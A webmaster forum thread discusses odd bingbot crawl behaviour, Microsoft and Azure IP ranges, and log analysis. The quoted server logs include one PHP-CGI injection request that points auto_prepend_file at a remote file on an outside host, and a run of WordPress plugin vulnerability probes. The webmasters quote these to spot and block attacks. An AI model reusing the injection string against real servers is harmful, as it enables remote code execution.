Welcome to WebmasterWorld Guest from 54.158.183.188

Forum Moderators: mack

Message Too Old, No Replies

bingbot? are you feeling all right?

     
12:30 am on Oct 28, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13537
votes: 403


Anyone else happen to notice this?

Background #1 I've got assorted ancient URLs that involve filenames in CamelCase. Some still exist, some have long since been redirected to completely different names, some are simply gone (410).
Background #2 About two years back, I moved sites and have since paid close attention to search engines' redirected requests.

For a short period-- less than 24 hours total-- all bingbot requests to my old site were strictly lower-case, regardless of the URL's correct casing. So any request for a page would have ended up with its directory's generic redirect, like

example.old/directory/lowercasename.html >> example.new/directory/lowercasename.html (URL which has never existed)

Just one site. And it stopped as suddenly as it started. So far :: fingers crossed :: I haven't seen any requests on the new site for these wholly nonexistent lower-case filenames.

Weird.
2:08 pm on Nov 3, 2015 (gmt 0)

Senior Member

WebmasterWorld Senior Member Top Contributors Of The Month

joined:Aug 1, 2013
posts:1338
votes: 22


Bing seems to be asleep at the moment (or perhaps the last six months at least). They're not even processing my sitemaps. I still have http / https duplicates showing up in the listings. Frustrating!
12:41 pm on Dec 11, 2015 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


Nonexistent file names & directories are indigenous to Bing. I've complained about it for years.
10:24 pm on Dec 20, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13537
votes: 403


Nonexistent file names & directories are indigenous to Bing.

How 'bout this one? Alongside a further one-off "lowercase.html" for correct "CamelCase.html"* there's ....
40.77.167.92 - - [17/Dec/2015:23:45:25 -0800] "GET /CookiePingback HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)" 
207.46.13.21 - - [18/Dec/2015:02:20:52 -0800] "GET /classic/headerinfo.ashx?site=undefined&lang=undefined&cur=JPY HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.74 - - [18/Dec/2015:08:12:01 -0800] "GET /ebooks/perez/css/custom-bg.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.74 - - [18/Dec/2015:08:12:03 -0800] "GET /ebooks/perez/css/mediaelementplayer.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.74 - - [18/Dec/2015:08:12:06 -0800] "GET /ebooks/perez/css/settings.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.74 - - [18/Dec/2015:08:12:09 -0800] "GET /ebooks/perez/css/shortcodes.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.74 - - [18/Dec/2015:08:12:12 -0800] "GET /inc/vbulletin_autosave.js HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.92 - - [18/Dec/2015:08:14:20 -0800] "GET /ebooks/perez/css/font-awesome.min.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.92 - - [18/Dec/2015:08:14:24 -0800] "GET /ebooks/perez/css/main.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.92 - - [18/Dec/2015:08:14:26 -0800] "GET /ebooks/perez/css/owl.carousel.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.92 - - [18/Dec/2015:08:14:29 -0800] "GET /ebooks/perez/css/video-js.min.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
40.77.167.92 - - [18/Dec/2015:08:14:32 -0800] "GET /ebooks/perez/js/vendor/modernizr-2.6.2.min.js HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.21 - - [18/Dec/2015:08:18:05 -0800] "GET /ebooks/perez/css/animate.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
207.46.13.21 - - [18/Dec/2015:08:18:07 -0800] "GET /ebooks/perez/css/reset.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.130 - - [18/Dec/2015:08:48:11 -0800] "GET /ebooks/perez/css/bootstrap.min.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.130 - - [18/Dec/2015:08:48:12 -0800] "GET /ebooks/perez/css/bootstrap1740.min.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.130 - - [18/Dec/2015:08:48:12 -0800] "GET /ebooks/perez/css/jquery.fs.shifter.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.120 - - [18/Dec/2015:08:48:20 -0800] "GET /ebooks/perez/css/knight-iconfont.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
157.55.39.120 - - [18/Dec/2015:08:48:21 -0800] "GET /ebooks/perez/css/magnific-popup.css HTTP/1.1" 404 1432 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
Er, wtf? /ebooks/perez/ is a real directory; /inc/ is not. Nor have I ever, anywhere, had a directory called /css/ or /js/ In fact the idea makes my skin crawl, because who needs so many stylesheets that they need to be collected in their own directory?

Some of those imaginary filenames make me wonder if it's got something to do with bing's ventures into responsiveness-land.


* The irony is that I just recently redirected half-a-dozen of those CamelCase URLs as they were giving me the fantods. Not to lowercase, which would have been pointless, but to a different name entirely.
11:43 pm on Dec 20, 2015 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


I've been trying to figure out Bing's requests for a while. I gave up.
6:43 am on Dec 21, 2015 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


I think if we attempt to find a logical explanation to these Bing request anomalies, it only serves frustration,.

I once thought the source may have been a corrupted link directoy Bing was using for discovery. My next guess was my own file server was the cause, but if so why didn't other bots duplicate the errors?

Googlebot does occasionally look for similar badly formed links on my servers but nowhere close to that of Bing.

It remains a mystery... along with my missing socks.
3:05 am on Dec 22, 2015 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member tangor is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Nov 29, 2005
posts:7208
votes: 453


No Worries, Be Happy. Why? No real traffic involved, just a log entry that ticks the anal retentive off. Bing does continue to serve better results than G... and that/s what I take to the bank (as I am not reliant on G for income, but I am reliant on good traffic).
4:30 am on Dec 22, 2015 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


"...a log entry that ticks the anal retentive off"

Have you tried prunes?
4:27 am on Jan 2, 2016 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member

joined:Mar 17, 2006
posts: 838
votes: 0


Well, I too got Bing crawling URIs that look like its doing penetration testing. Non-existent scripts, js, css files, some with clearly unique session IDs in them etc. It looks horrible, and it sounds like it's not benign either. Sites with these crap URIs being visited are dropping from Bing's index like flies. I have a few already that lost 99% of the previously indexed URLs. Similarly affected is the traffic, too.

So, responding to tangor - there's a reason to worry. Traffic is involved. 90% down is pretty darn dramatic, and looks like it's due to some error or perhaps an attack that exploits some sort of a weakness in Bing. I filed a message with Bing Help about this - not sure if they will ever respond. I've never really gotten a reply from them before.
4:42 am on Jan 2, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


I exchanged emails with Bing support for several weeks a year ago. First they denied it. Then after I sent numerous log examples to them they acknowedged the issue and said a fix was in place and I should wait till the next crawl index to see the correction.

That never happened.
4:05 am on Jan 29, 2016 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2004
posts:1888
votes: 56


and now a new LACNIC Range...

ip: 191.232.136.94
remote host: msnbot-191-232-136-94.search.msn.com

inetnum: 191.232/14
aut-num: AS8075
abuse-c: BEORN2
owner: Microsoft Informatica Ltda
7:32 am on Jan 29, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13537
votes: 403


Crikey, is that a real msn range? I know I've got it labeled from a while back, but re-checking logs I don't find anything but malign and/or garbage requests with assorted highly dubious UAs.
191.232.39.241 - - [24/Jan/2016:22:19:43 -0800] "GET /?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://www.example.com.br/img/r.txt HTTP/1.1" 403 3469 "-" "LWP::Simple/6.00 libwww-perl/6.05"
Turns out that was just a few days ago; I didn't notice it because of the out-of-sight out-of-mind 403 response. (%3D is the = sign. Had to go look that up. I assume the UA is what got them blocked.)
9:05 am on Jan 29, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


191.232.136.24 - - [29/Jan/2016:00:43:58 -0800] "GET /page.html HTTP/1.1" 200 2984 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

The problem is that while this is a valid crawl range: msnbot-191-232-136-24.search.msn.com... Other sub-ranges of the /14 show as Microsoft's Azure Cloud in Brazil & can be leased by anyone (think AWS.) This is why there are so many spam & hack reports at webhoneypot, spamhaus & other reporting agencies.

So maybe a more surgical approach w/ a few conditions is need for:
191.232.0.0 - 91.235.255.255
191.232.0.0/14

BTW, this MS block is actually much larger including other MS assignments:
191.232.0.0 - 191.239.255.255
191.232.0.0/13
10:29 am on Jan 29, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


I didn't notice it because of the out-of-sight out-of-mind 403 response
Funny, that's the one thing I *always* examine in my server logs. I pull all the 403s and see who/why they got blocked. This really pays off & IMO is essential if (like me) you block server ranges... they are always being re-purposed & re-allocated. A huge percentage of server farms now have mobile allocations & cloud servers leased to mobile apps, which translates into human traffic.
1:47 pm on Jan 29, 2016 (gmt 0)

Administrator from US 

WebmasterWorld Administrator not2easy is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2006
posts:3107
votes: 120


104.40.0.0 - 104.47.255.255
104.40.0.0/13
Is another msft range full of malicious visitors - NOT pretending to be bingbot, but switching UAs on the fly:
104.45.146.213 - - [23/Jan/2016:12:01:24 -0600] "GET /wp-content/plugins/custom-content-type-manager/index.html HTTP/1.1" 404 3383 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.66 Safari/535.11"
104.45.146.213 - - [23/Jan/2016:12:01:24 -0600] "GET /wp-content/plugins/fcchat/default.png HTTP/1.1" 404 3383 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24"
104.45.146.213 - - [23/Jan/2016:12:01:24 -0600] "GET /wp-content/plugins/magic-fields/MF_Constant.php HTTP/1.1" 404 3384 "-" "Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Safari/535.1"
104.45.146.213 - - [23/Jan/2016:12:01:24 -0600] "GET /wp-content/plugins/nextgen-gallery/changelog.txt HTTP/1.1" 404 3383 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Ubuntu/11.04 Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.11"
My logs show 15 hits per second from that range, for a long string of seeking vulnerabilities.
9:53 pm on Jan 29, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13537
votes: 403


I pull all the 403s and see who/why they got blocked.

I only check for blocked humans, manifested by requests for errorstyles.css on originating site, and/or piwik request for forbidden.html. (I included piwik code on the 403 page for this very reason.)
12:24 am on Jan 30, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


...switching UAs on the fly
That's just a script setting. AFAIK several GET scripts do that. There's a popular, free PHP script that has that option.
12:40 am on Jan 30, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


As far as piwik goes... I don't use any traffic stat type of software that requires their code in my markup. If it serves your needs, great but I've tried several and they never gave me enough aggregated info to justify the extra code in my pages. And the ones that require a remote HTTP connection like Google Analytics were the worst!

I just download my raw access logs to my local machine, then open it through a customized version of Analog to produce an informative zeitgeist. I really like Analog and have used it for years.
3:48 am on Jan 30, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13537
votes: 403


<topic drift>
they never gave me enough aggregated info to justify the extra code in my pages

Funny you should say that, because I can go for months on end without even looking at the piwik page. And it is a huge script, something like 25k. In fact the main thing I do with it is tracking the mere act of requesting /piwik.php, because this is a pretty solid indicator of, er, humanity. Of course the great advantage of piwik-or-similar vs. GA-or-similar is that, because it lives on your own server, it's subject to your own access controls. So the GA problem of reported visits from people who were never allowed to set foot on your site-- assuming they even tried-- doesn't occur.

When I do check analytics, the one thing I especially like to look at is Outbound Links. I like to see where people went, and where they went there from. (ymmv, but I love the thought that when people leave my site-- as inevitably they must-- they're going someplace where I sent them.)

Then again, I've got such teeny little sites, I can wrangle my raw logs in javascript. That's tiny ;)
</td>
4:35 pm on Jan 31, 2016 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2004
posts:1888
votes: 56


I still get requests for all lower case URIs from 157.55.39.NNN and 40.77.167.NNN IPs for the past several days. Yesterday I changed the code to send 400 Not Implemented response and after about 40 hits they stopped for about an hour. Then the bots decided to crawl NON WWW version of properly cased URLs. So I changed the code to send 400 to those too.

Haven't seen any monkish requests since. What Gives?
3:56 am on Feb 3, 2016 (gmt 0)

Moderator from US 

WebmasterWorld Administrator keyplyr is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Sept 26, 2001
posts:7746
votes: 262


<serious topic drift>
And it is a huge script, something like 25k
With mobile search, if pages are large, Google will attempt to serve a transcoded or weblight version of your page in regions where connection speed is below a certain marker. Some browsers (desktop & mobile) also do this, as do some SEs in other countries (especially China, India & Indonesia.)

I said "attempt" because even we use the "no-transform" header tag or block transcoder or weblight entirely, Google will *still* put their stupid lean version of our pages in their mobile SERP, it's just the visitor gets whatever alternative result we create (403, 404, etc...) by not allowing it in many cases.
</std>
(sorry to give you an std)
6:57 pm on Feb 3, 2016 (gmt 0)

Senior Member from US 

WebmasterWorld Senior Member lucy24 is a WebmasterWorld Top Contributor of All Time 5+ Year Member Top Contributors Of The Month

joined:Apr 9, 2011
posts:13537
votes: 403


:: snrk ::
6:23 pm on Feb 9, 2016 (gmt 0)

Senior Member

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month

joined:Dec 27, 2004
posts:1888
votes: 56


So just for kickers I created Bing Webmaster Tool Account to see what is going on on this one site.

Interesting Drill down architecture. All CamelCase URIs are lowercased in the reports. That freaked me out though, at first, but then again who does not make mistakes in.... right?
I thought maybe it is in CSS? nope, view source on their site, Bing Webmaster Tools >> Index Explorer >> shows lower case. In reality lower cased URI is redirected to CamelCase since 2004. I picked this particular one(URI) because it was tried in lower case 41 times when the fiasco started.
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

Featured Threads

Free SEO Tools

Hire Expert Members